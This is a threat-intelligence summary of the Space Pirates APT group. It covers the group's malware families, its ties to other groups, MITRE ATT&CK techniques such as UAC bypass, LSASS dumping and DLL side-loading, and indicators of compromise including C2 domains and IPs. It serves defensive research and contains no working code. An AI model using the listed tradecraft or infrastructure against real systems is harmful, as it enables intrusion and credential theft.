Threat Research

Space Pirates: исследуем инструменты и связи новой хакерской группировки

Securonix

Space Pirates is an Asia-rooted advanced threat group whose activities span several backdoors and loaders, targeting government and aerospace/energy sectors in Russia, Georgia, and Mongolia. The report ties Space Pirates to multiple other APTs and tooling exchanges, describes specific malware families (MyKLoadClient, Zupdax, BH_A006, Deed RAT, RtlShare, PlugX, Downloader variants, and more), and outlines their network infrastructure, C2 protocols, and methods of persistence and evasion.
#SpacePirates #Zupdax #MyKLoadClient #BH_A006 #DeedRAT #PlugX

Keypoints

  • Space Pirates is a newly named APT observed using a mix of bespoke loaders, backdoors, and publicly known VPOs (e.g., PlugX, ShadowPad, Poison Ivy) areals across Russia, Georgia, and Mongolia.
  • Core malware families include MyKLoadClient, Zupdax, BH_A006, Deed RAT, and RtlShare, with additional components like Downloader variants and PlugX, plus a custom C2 protocol stack.
  • The group relies on shared network infrastructure and DDNS domains, often communicating over TCP/UDP with unencrypted traffic and flexible C2 strategies, including DNS-over-HTTPS fallback.
  • There are numerous overlaps with other Asian-origin groups (Winnti, Bronze Union, TA428, RedFoxtrot, Night Dragon), suggesting tool and infrastructure exchanges and possible collaboration.
  • Space Pirates employs sophisticated loading and obfuscation techniques, including DLL side-loading, reflective loading, multi-stage loaders, UAC bypass, and service/registry persistence mechanisms.
  • Victims include government entities and aerospace/IT sectors; some intrusions persisted for months, with extensive data exfiltration and network reconnaissance earlier in the campaigns.

MITRE Techniques

  • [T1566.001] Phishing: Spearphishing Attachment – “Space Pirates uses phishing emails with malicious attachments.”
  • [T1566.002] Phishing: Spearphishing Link – “Space Pirates uses phishing emails with links to VPO.”
  • [T1059.003] Execution: Windows Command Shell – “the malware has remote command line capability.”
  • [T1059.005] Execution: Visual Basic – “Space Pirates uses VBS scripts, including ReVBShell.”
  • [T1106] Native API – “uses WinAPI to spawn processes and inject shellcode.”
  • [T1053.002] Scheduled Task/Job: At (Windows) – “uses atexec.py to run commands on a remote node.”
  • [T1053.005] Scheduled Task – “uses system tasks for persistence/remote execution.”
  • [T1569.002] System Services: Service Execution – “creates malicious services.”
  • [T1547.001] Boot or Logon Autostart: Registry Run Keys / Startup Folder – “uses Run/RunOnce keys for persistence.”
  • [T1548.002] Privilege Escalation: Bypass User Account Control – “various UAC bypass techniques are present.”
  • [T1068] Exploitation for Privilege Escalation – “mentions CVE-2017-0213 for elevation.”
  • [T1027.001] Obfuscated Files/Information: Binary Padding – “RtlShare drops random bytes to payload.”
  • [T1027.002] Obfuscated Files/Information: Software Packing – “BH_A006 obfuscated with an unknown protector.”
  • [T1036.004] Masquerading: Masquerade Task/Service – “services use legitimate-looking names.”
  • [T1036.005] Masquerading: Match Legitimate Name or Location – “masquerades as legitimate software.”
  • [T1055] Process Injection – “injects shellcode into processes.”
  • [T1055.001] Process Injection: DLL Injection – “inject DLL into other processes.”
  • [T1078.002] Valid Accounts: Domain Accounts – “uses compromised privileged accounts.”
  • [T1112] Modify Registry – “Deed RAT stores configuration and plugins in the registry.”
  • [T1140] Deobfuscate/Decode Files or Information – “encrypts configuration and payload with various algorithms.”
  • [T1197] BITS Jobs – “uses BITS to download threats.”
  • [T1218.011] Signed Binary Proxy Execution: Rundll32 – “rundll32-based loading is used.”
  • [T1553.002] Subvert Trust Controls: Code Signing – “some Zupdax samples are signed with stolen certs.”
  • [T1564.001] Hide Artifacts: Hidden Files/Directories – “stores malware in hidden ProgramData folders.”
  • [T1574.002] Hijack Execution Flow: DLL Side-Loading – “uses legitimate apps vulnerable to DLL side-loading.”
  • [T1620] Reflective Code Loading – “uses reflective loading to execute payloads in memory.”
  • [T1555.003] Credentials from Web Browsers – “Chromepass is used to exfiltrate browser passwords.”
  • [T1003.001] OS Credential Dumping: LSASS Memory – “obtains LSASS dumps for credentials.”
  • [T1090.001] Proxy: Internal Proxy – “Deed RAT can use proxies to reach C2.”
  • [T1087.001] Account Discovery: Local Account – “collects local user accounts.”
  • [T1087.002] Account Discovery: Domain Account – “collects domain accounts via CSVDE.”
  • [T1082] System Information Discovery – “gathers OS, CPU, memory, disks.”
  • [T1614.001] System Language Discovery – “collects LCID language ID.”
  • [T1016] System Network Configuration Discovery – “collects network parameters.”
  • [T1069.002] Domain Groups – “collects domain groups via CSVDE.”
  • [T1083] File and Directory Discovery – “discovers documents like .doc/.pdf.”
  • [T1033] System Owner/User Discovery – “gathers user data.”
  • [T1057] Process Discovery – “uses tasklist.exe to view processes.”
  • [T1021.002] Remote Services: SMB/Windows Admin Shares – “uses atexec.py and psexec.rb for lateral movement.”
  • [T1119] Automated Collection – “searches and copies documents.”
  • [T1560.001] Archive Collected Data: Archive via Utility – “archives stolen documents with 7-Zip.”
  • [T1056.001] Keylogging – “can log user keystrokes.”
  • [T1071.001] Web Protocols – “Deed RAT can encapsulate protocol in HTTP/HTTPS.”
  • [T1071.004] DNS – “encapsulates protocol in DNS.”
  • [T1132.001] Data Encoding: Standard Encoding – “compresses with LZNT1/LZW.”
  • [T1573.001] Encrypted Channel: Symmetric Cryptography – “encrypts network messages.”
  • [T1008] Fallback Channels – “can operate via multiple C2s and update via web pages.”
  • [T1095] Non-Application Layer Protocol – “uses custom protocols for C2.”
  • [T1105] Ingress Tool Transfer – “downloads utilities from C2 using certutil.”
  • [T1571] Non-Standard Port – “uses non-standard ports for C2.”
  • [T1572] Protocol Tunneling – “tunnels traffic using dog-tunnel.”
  • [T1090.001] Proxy: Internal Proxy – “Deed RAT discovers and uses proxies to C2.”

Indicators of Compromise

  • [File Hashes] context – 5847c8b8f54c60db939b045d385aba0795880d92b00d28447d7d9293693f622b, 56b9648fd3ffd1bf3cb030cb64c1d983fcd1ee047bb6bd97f32edbe692fa8570, and 2 more hashes
  • [IP Addresses] context – 207.148.121.88, 47.108.89.169, and 2 more addresses
  • [Domains] context – microft.dynssl.com, micro.dns04.com, and 2 more domains
  • [C2/URLs] context – TCP://ftp.microft.dynssl.com:53412, https://dns.google/dns-query, and 2 more URLs
  • [File Names] context – Петербургский международный экономический форум (ПМЭФ)____2019.exe, siteadv.exe, cc.tmp, client.exe

Read more: https://www.ptsecurity.com/ru-ru/research/pt-esc-threat-intelligence/space-pirates-tools-and-connections/#id5-2